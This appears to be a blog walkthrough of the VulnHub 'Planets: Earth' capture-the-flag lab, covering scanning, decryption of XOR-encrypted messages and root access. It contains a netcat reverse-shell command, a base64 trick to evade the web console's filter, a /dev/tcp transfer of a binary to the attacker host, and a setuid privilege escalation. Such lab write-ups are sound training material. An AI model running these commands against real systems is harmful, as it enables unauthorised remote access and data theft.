The Planets: Earth || Vulnhub Complete Walkthrough

Earth is an easy box though you will likely Capture the Flag (CTF) and be on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an MD5 hash. This has been tested on VirtualBox so may not work correctly on VMware.


Settings Up

There will be no issue with settings up The Planets Earth Machine, just follow the below steps:

1. Download the Mirror image from VulnHub. (CLICK HERE)

2. Open Virtual Box and then click on Import and then select the downloaded file.

3. Once Your import successful, You can now set the interface to Vbox guest addition. This process will help you in the Enumeration phase.


Enumeration

Our First step is to Find out the target IP address using NetDiscover.

  • Note: Previously we have imported the VirtualMachine (OVA) File to VirtualBox.

  Currently scanning: 192.168.99.0/16   |   Screen View: Unique Hosts                                                               
                                                                                                                                   
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:db:90:6f      1      42  PCS Systemtechnik GmbH                                                          
  192.168.56.104  08:00:27:a2:0e:43      1      60  PCS Systemtechnik GmbH   

From the Scanning we have discovered the target IP address i.e. 192.168.56.104.


Network Enumeration using Nmap

We have discovered an IP address, so let's Perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:

  • -sC: Performs a script scan using the default set of scripts. It is equivalent to -- script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission. 
  • -sV: Enables version detection, which will detect what versions are running on what port.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ sudo nmap -sV -sC -v -T4 192.168.56.104
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 16:53 IST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Initiating ARP Ping Scan at 16:53
Scanning 192.168.56.104 [1 port]
Completed ARP Ping Scan at 16:53, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:53
Completed Parallel DNS resolution of 1 host. at 16:53, 0.22s elapsed
Initiating SYN Stealth Scan at 16:53
Scanning 192.168.56.104 [1000 ports]
Discovered open port 80/tcp on 192.168.56.104
Discovered open port 443/tcp on 192.168.56.104
Discovered open port 22/tcp on 192.168.56.104
Completed SYN Stealth Scan at 16:53, 6.21s elapsed (1000 total ports)
Initiating Service scan at 16:53
Scanning 3 services on 192.168.56.104
Completed Service scan at 16:53, 12.22s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.56.104.
Initiating NSE at 16:53
Completed NSE at 16:53, 2.59s elapsed
Initiating NSE at 16:53
Completed NSE at 16:54, 1.38s elapsed
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Nmap scan report for 192.168.56.104
Host is up (0.024s latency).
Not shown: 985 filtered tcp ports (no-response), 12 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa 65d2 1a9e 0718 4b54 41da 3712 f187
|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:A2:0E:43 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.32 seconds
           Raw packets sent: 1989 (87.500KB) | Rcvd: 16 (1.024KB)
┌─[mrdev@TS]─[~]
└──╼ $

We spot three open ports: Port 22(OpenSSH 8.6 (protocol 2.0)), Port 80 (Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)), and Port 443 (Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)).

From The SSL Protocol (Port 443), we spotted two hostnames:

443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS: earth.local , DNS: terratest.earth.local
<SNIP>

Add two hostnames to /etc/hosts file.

┌─[mrdev@TS]─[~]
└──╼ $ sudo nano /etc/hosts

Open any Browser as your choice, and then visit the following Link:

earth.local

If you scroll down, you can be spotted a few encrypted messages that are signed with Message Key:


Directory Busting using Gobuster

Navigating any hidden or hardly accessible directories and pages, and that is through dir busting (Directory Busting). Using gobuster as our tool of choice, we can use the following switches for the script to get the fastest, most accurate results.

  • dir : Uses directory/file enumeration mode. 
  • -u : The target URL. 
  • -w : Path to the wordlist.

┌─[mrdev@TS]─[~]
└──╼ $gobuster dir -u http://earth.local/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://earth.local/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/23 20:11:12 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> /admin/]
/cgi-bin/             (Status: 403) [Size: 199]            
                                                           
===============================================================
2022/01/23 20:11:48 Finished
===============================================================
┌─[mrdev@TS]─[~]
└──╼ $

We might get lucky and find an admin page that may help us find leverage against the target in combination with the credentials.

If you click on Login, then it will redirect to a Login Page:

We don't have any credentials to get login access, so we have to find out the credentials. After few research, I find out that the second DNS is a Test Site that may give us any clue:

Open Browser and Visit this site:

  • Remember: Access this site with SSL (HTTPS)

https://terratest.earth.local/


Again, we have to find out Active directories using gobuster.

┌─[mrdev@TS]─[~]
└──╼ $gobuster dir -u https://terratest.earth.local/ -k -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://terratest.earth.local/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/23 20:27:58 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/cgi-bin/             (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 26] 
/robots.txt           (Status: 200) [Size: 521]
                                               
===============================================================
2022/01/23 20:29:36 Finished
===============================================================
┌─[mrdev@TS]─[~]
└──╼ $

After successful Directory Busting, we spotted an interesting file (i.e., robots.txt).

https://terratest.earth.local/robots.txt

And again we discover another interesting file (i.e., /testingnotes.*).

https://terratest.earth.local/testingnotes.txt

Seems to be some developer/admin who may be left Note on the network. 

From the note, we can confirm that the encryption algorithm is XOR and the key might be from testdata.txt. Likewise, the username for the admin portal is terra. Also, the admin portal is /admin on the other website.

https://terratest.earth.local/testdata.txt

It seems like this is what was used to encrypt the first few messages we see on the earth.local page. Let’s try to decode the messages on that page using this information.


Decrypting Encrypted Messages with CyberChef

Let's Decrypt the Message using Cyberchef.

  • Learn more: 

CyberChef: The Cyber Swiss Army Knife

This article explores CyberChef, a versatile tool used by cybersecurity professionals for various tasks such as encoding, decoding, encryption, and decryption. It discusses the features of CyberChef and its significance in analyzing and manipulating data during security assessments and forensic investigations.


Visit Cyberchef :

The Messages are in the form of Hexadecimal and we have to decrypt to XOR. Drag and drop From Hex and XOR Operations to Recipe:


Input the decrypt Message one by one and also paste the key that we have found from "testdata.txt".

  • Remember: The Key is set to UTF-8.

It seems that we get earthclimatechangebad4humans as a repeating string. It may be a password of the user terra.


Foothold

Let’s try to log in with the user terra. The login pannel we have found in previous.

After successful Login we got a CLI command line interface. Let's try with a simple command:

Our assumption was true and we got a Command Output. So let's try to get a Remote command line interface:

nc -e /bin/sh 192.168.56.1 4444


We got a Warning, which means we can not get a Remote connection by using the simplest method:

We can bypass this by converting it to its decimal notation. Or, we can encode the command in the base64 format.

Open terminal and input below command:

┌─[mrdev@TS]─[~]
└──╼ $ echo 'nc -e /bin/sh 192.168.56.1 4444' | base64
bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEgNDQ0NAo=
┌─[mrdev@TS]─[~]
└──╼ $

Now copy this output and switch back to Browser paste with base64 decode command, Before that make sure that Netcat is started.

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...

Now copy the below command and paste to CLI Command Line interface:

echo ' {Decoded script} ' | base64 -d | bash

The Netcat start to Listening on Port 4444 from a UNKNOWN source.

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.104] 34816
python -c 'import pty;pty.spawn("bin/bash")'   # Upgrade the Shell
bash-5.1$ whoami
whoami
apache
bash-5.1$

We have successfully foothold The Planet: Earth but we don't have any Administrator Privileges.


Privilege Escalation

Let’s check our SUIDs and see if there’s anyway we can escalate to root.

bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
bash-5.1$

We found an reset_root script that may help us to gain root access. Let me run this script:

bash-5.1$ file /usr/bin/reset_root    # Find out file information
file /usr/bin/reset_root
/usr/bin/reset_root: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4851fddf6958d92a893f3d8042d04270d8d31c23, for GNU/Linux 3.2.0, not stripped
bash-5.1$ reset_root    # Execute reset_root the script
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
bash-5.1$

When I run the script, I got the error message RESET FAILED.  Next we have to modify the script so move reset_root script to Local desktop using below command:

bash-5.1$ cat /usr/bin/reset_root > /dev/tcp/192.168.56.1/3333                                             

Before executing the upper command you have to open a new terminal and start another listener.


We have downloaded reset_root file to local storage. Let's trace using Itrace:

┌─[mrdev@TS]─[~]
└──╼ $ chmod +x reset_root    # Give an executable permission
┌─[mrdev@TS]─[~]
└──╼ $ ltrace ./reset_root     # Trace the reset_root file
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                      = 38
access("/dev/shm/kHgTFI5G", 0)                                                   = -1
access("/dev/shm/Zw7bV9U5", 0)                                                   = -1
access("/tmp/kcM0Wewe", 0)                                                       = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                      = 44
+++ exited (status 0) +++
┌─[mrdev@TS]─[~]
└──╼ $

From the output, we mark that three files are missing on the shown locations. Therefore, we have to create those files on the target. Lastly, when I ran the binary, it changed the password of the root.

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
bash-5.1$

Let's execute the reset_root file again:

bash-5.1$ reset_root
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$

Reset successful and the password of root set to Earth. Let's switch back to root user and find out the flags:

bash-5.1$ su root
su root
Password: Earth
[root@earth /]# cd /root
cd /root
[root@earth ~]# ls
ls
anaconda-ks.cfg  root_flag.txt
[root@earth ~]# cat root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
[root@earth ~]# cd ..
cd ..
[root@earth /]# cd /var/earth_web
cd /var/ earth_web
[root@earth earth_web]# ls
ls
db.sqlite3  earth_web  manage.py  secure_message  user_flag.txt
[root@earth earth_web]# cat user_flag.txt
cat user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth earth_web]# 

Congratulation! we have successfully exploited VulnHub VMs.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!